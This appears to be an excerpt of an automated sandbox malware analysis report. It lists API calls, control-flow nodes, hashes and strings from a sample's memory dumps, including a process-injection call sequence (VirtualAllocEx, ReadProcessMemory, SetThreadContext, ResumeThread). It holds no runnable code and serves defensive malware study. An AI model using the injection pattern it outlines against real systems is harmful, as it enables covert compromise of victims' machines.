                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0266D5B6,?,?,?,?,?), ref: 0266D677
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BA7376
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BA7A38
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BA7376
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BA7A38
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BA7876
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0

                                                                              Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BA7876
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0266AF5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1303631640.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2660000_file.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06BA9DDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: e7d77305b391e08541300f70c1bb1c82800d661be5d2b1e30e236ce0e25908e0
                                                                              • Instruction ID: 5d8847de0c2ee60a4cbd4546c3fa8100332e160af57342ddaa81de64d5b04b26
                                                                              • Opcode Fuzzy Hash: e7d77305b391e08541300f70c1bb1c82800d661be5d2b1e30e236ce0e25908e0
                                                                              • Instruction Fuzzy Hash: C91106B58043499FDB10DF9AD485BDEFBF8EB48314F10845AE955A7200C375A984CFA5
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06BA9DDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 48f6aa9421c0c57bd51a40ebd012212ccc171e69da18b0edd29c7b8c0c801e37
                                                                              • Instruction ID: 2d960730e93f48c936a2afb5e85b7da0c8ab7b4f4594cd14ceaf8652748e84a4
                                                                              • Opcode Fuzzy Hash: 48f6aa9421c0c57bd51a40ebd012212ccc171e69da18b0edd29c7b8c0c801e37
                                                                              • Instruction Fuzzy Hash: BB11F2B58043499FDB10DF9AD485BDEFFF8EB48314F20845AE568A7240C375A984CFA5
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BAB369,?,?), ref: 06BAB510
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 3ad212d7b1023a0afafe82202fbbe0bb91d077218a86248bede8c7552d754193
                                                                              • Instruction ID: 37a28d6bd6879540af9d156dc5eee56b645443ea920ea09091ea2fd4839dc687
                                                                              • Opcode Fuzzy Hash: 3ad212d7b1023a0afafe82202fbbe0bb91d077218a86248bede8c7552d754193
                                                                              • Instruction Fuzzy Hash: E51136B68043498FDB20DF9AD444BEEBBF4EB48320F14845AD969A7340D379A944CFA5
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,06BAB369,?,?), ref: 06BAB510
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 6199457c82c6587a449ca587148e9767f316b75877cf8e991d1cc14fa6184933
                                                                              • Instruction ID: e3b14ad60fa523fb776109a18f5170feaebc23f9fe0d64ff2fd101a76e56a74a
                                                                              • Opcode Fuzzy Hash: 6199457c82c6587a449ca587148e9767f316b75877cf8e991d1cc14fa6184933
                                                                              • Instruction Fuzzy Hash: 7E1125B68043498FDB24DF9AD444BEEBBF0EB48320F14845AD569A7240C339A584CFA5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1308748171.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_6ba0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: {xtp
                                                                              • API String ID: 0-3704491175
                                                                              • Opcode ID: a309ceed3936c64fa09854979a14566aff6861d5186b5d4bf311431c24cf65d0
                                                                              • Instruction ID: 402a662ea7e1ed30f0021de7aa513f8d681d05535a2c931a1ac8751bf4f915a6
                                                                              • Opcode Fuzzy Hash: a309ceed3936c64fa09854979a14566aff6861d5186b5d4bf311431c24cf65d0
                                                                              • Instruction Fuzzy Hash: EAE10BB4E142198FDB54DFA9C580AAEFBF2FF89304F2481A9D414AB355D731A941CFA0

                                                                              Execution Graph

                                                                              Execution Coverage:1.3%
                                                                              Dynamic/Decrypted Code Coverage:4.5%
                                                                              Signature Coverage:8.4%
                                                                              Total number of Nodes:155
                                                                              Total number of Limit Nodes:15

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 222 417a73-417a8f 223 417a97-417a9c 222->223 224 417a92 call 42f553 222->224 225 417aa2-417ab0 call 42fb53 223->225 226 417a9e-417aa1 223->226 224->223 229 417ac0-417ad1 call 42dff3 225->229 230 417ab2-417abd call 42fdf3 225->230 236 417ad3-417ae7 LdrLoadDll 229->236 237 417aea-417aed 229->237 230->229 236->237
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                              • Instruction ID: 3da9ad656e2a33d7f058596d6c0db2f8ecc23348adbfd370e033ddd8e755fe76
                                                                              • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                              • Instruction Fuzzy Hash: EC0152B1E0010DBBDF10DAA5DC42FDEB778AF54308F4481A6E90897240F674EB588755

                                                                              Control-flow Graph

                                                                              control_flow_graph 248 42c8d3-42c90f call 404663 call 42db03 NtClose
                                                                              APIs
                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C90A
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction ID: edcd4929374db9964348cfcf96216c1e7e48739ffbccb93e989d5216367ee6f6
                                                                              • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction Fuzzy Hash: CCE04F752042147BC220EA6ADC41FAB775CDFC6714F108419FA4977241C7757910C7F4

                                                                              Control-flow Graph

                                                                              control_flow_graph 262 17e2b60-17e2b6c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                              • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                                              • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                              • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                              • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                                              • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                              • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222

                                                                              Control-flow Graph

                                                                              control_flow_graph 263 17e2c70-17e2c7c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                              • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                                              • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                              • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                              • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                                              • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                              • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3

                                                                              Control-flow Graph

                                                                              control_flow_graph 0 41422d-414237 1 414271-414274 0->1 2 414239-414240 0->2 3 414242-41424c 2->3 4 414289-41429e 2->4 3->1 5 4142a0-4142b8 4->5 6 41431f-414341 4->6 5->6 7 414363-414368 6->7 8 414343-414354 PostThreadMessageW 6->8 8->7 9 414356-414360 8->9 9->7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                              • API String ID: 0-152878582
                                                                              • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                              • Instruction ID: c275fd484e462aee15a3afa9325c1543472fcda4a2c72e174b33f2e44c37e21e
                                                                              • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                              • Instruction Fuzzy Hash: 1B118C71B853576ACB02CEA08C81BDDB7649F92B00F0486EBE9449F6C1D3B58D878795

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 00414350
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 7046-nn1K$7046-nn1K
                                                                              • API String ID: 1836367815-59622768
                                                                              • Opcode ID: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                              • Instruction ID: 516b92e160089bb7b3fe599ab1603a73bfc270ec1e4e33151ab2bbf8a00857f9
                                                                              • Opcode Fuzzy Hash: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                              • Instruction Fuzzy Hash: FA010831E4021876DB20AB919C02FDF7B7C9F80B04F008016FB147B2C0D6BC570687A9

                                                                              Control-flow Graph

                                                                              control_flow_graph 28 414416-414417 29 414419-414428 28->29 30 4143af 28->30 31 4143b1 30->31 32 414365-414368 30->32 33 4143b3-4143c0 31->33 34 414342-414354 PostThreadMessageW 31->34 36 4143c3-4143c6 33->36 37 414363-414364 34->37 38 414356-414360 34->38 39 4143e6-4143ea 36->39 40 4143c8-4143cc 36->40 37->32 38->37 39->36 42 4143ec-4143f0 39->42 40->39 41 4143ce-4143d2 40->41 41->39 43 4143d4-4143d8 41->43 43->39 44 4143da-4143de 43->44 44->39 45 4143e0-4143e4 44->45 45->39 46 4143f1-414401 45->46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7046-nn1K$7046-nn1K
                                                                              • API String ID: 0-59622768
                                                                              • Opcode ID: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                              • Instruction ID: c4b73eb21b230dc31030ab9c1f53721eb1c4f484e884d00b70ebd9f1df3f4591
                                                                              • Opcode Fuzzy Hash: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                              • Instruction Fuzzy Hash: 9701267578E28C2DFF31DA6068C1EE27F089782708F0881DFDD689F283D94A59865355

                                                                              Control-flow Graph

                                                                              control_flow_graph 212 417af3-417b2b 214 417b2c-417b37 212->214 214->214 215 417b39-417b40 214->215 216 417b42 215->216 217 417ac4-417ad1 call 42dff3 215->217 220 417ad3-417ae7 LdrLoadDll 217->220 221 417aea-417aed 217->221 220->221
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                              • Instruction ID: 974bac3e534c670f7ac2524caa8da76db0f880a9a0dc8598db73eafaeed0b4e5
                                                                              • Opcode Fuzzy Hash: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                              • Instruction Fuzzy Hash: 5A019C36A0810C7FCF10DAA4DC429EE7B78DF41285F040659D685E7201E632B64F8789

                                                                              Control-flow Graph

                                                                              control_flow_graph 238 42cbf3-42cc37 call 404663 call 42db03 RtlAllocateHeap
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,0041E80E,?,?,00000000,?,0041E80E,?,?,?), ref: 0042CC32
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction ID: 2846fa4b3233f60a92fef8d27f7aa413956122f50d55b758d752c0d3958e743e
                                                                              • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction Fuzzy Hash: 28E06DB12082097BCA10EE59DC41FAB37ACEFC5714F004419FA08A7241DB74B91087B8

                                                                              Control-flow Graph

                                                                              control_flow_graph 243 42cc43-42cc87 call 404663 call 42db03 RtlFreeHeap
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,004172DE,000000F4), ref: 0042CC82
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                              • Instruction ID: cc980803f6f00e9c11348fd80cdf1fb29ca32894386c6b15e328b1e50aae6e2f
                                                                              • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                              • Instruction Fuzzy Hash: 80E092B12142087BD610EF59DC41FDB3BACEFC5710F004419FA08A7241D775B9108BB8

                                                                              Control-flow Graph

                                                                              control_flow_graph 253 42cc93-42cccf call 404663 call 42db03 ExitProcess
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,6995A257,?,?,6995A257), ref: 0042CCCA
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                              • Instruction ID: ac3c5cb8458b9ec8aaad2dc6460039598258f1f05cf85b266bad946a97558dfc
                                                                              • Opcode Fuzzy Hash: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                              • Instruction Fuzzy Hash: 38E086356002147BD110EB6ADC41FD7776CDFC6710F004519FA48A7242C675790187F5

                                                                              Control-flow Graph

                                                                              control_flow_graph 258 17e2c0a-17e2c0f 259 17e2c1f-17e2c26 LdrInitializeThunk 258->259 260 17e2c11-17e2c18 258->260
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                                              • Instruction ID: e459c39f64e16b2b85943c9682b89611a3127dd16eed8a43c9003c9788d0d412
                                                                              • Opcode Fuzzy Hash: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                                              • Instruction Fuzzy Hash: B2B09B719055C5C5DF11E764460C717B954B7D5701F15C075D3030652F4738C1E5E276
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332
                                                                              Strings
                                                                              • 8, xrefs: 018152E3
                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                                              • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                                              • Thread identifier, xrefs: 0181553A
                                                                              • Critical section address., xrefs: 01815502
                                                                              • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                                              • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                                              • corrupted critical section, xrefs: 018154C2
                                                                              • Invalid debug info address of this critical section, xrefs: 018154B6
                                                                              • undeleted critical section in freed memory, xrefs: 0181542B
                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                                              • double initialized or corrupted critical section, xrefs: 01815508
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                              • API String ID: 0-2368682639
                                                                              Strings
                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
